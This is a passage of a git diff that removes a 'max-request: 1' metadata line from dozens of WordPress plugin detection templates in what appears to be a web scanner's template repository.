index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 9c6e3e6d2e..1778552d75 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
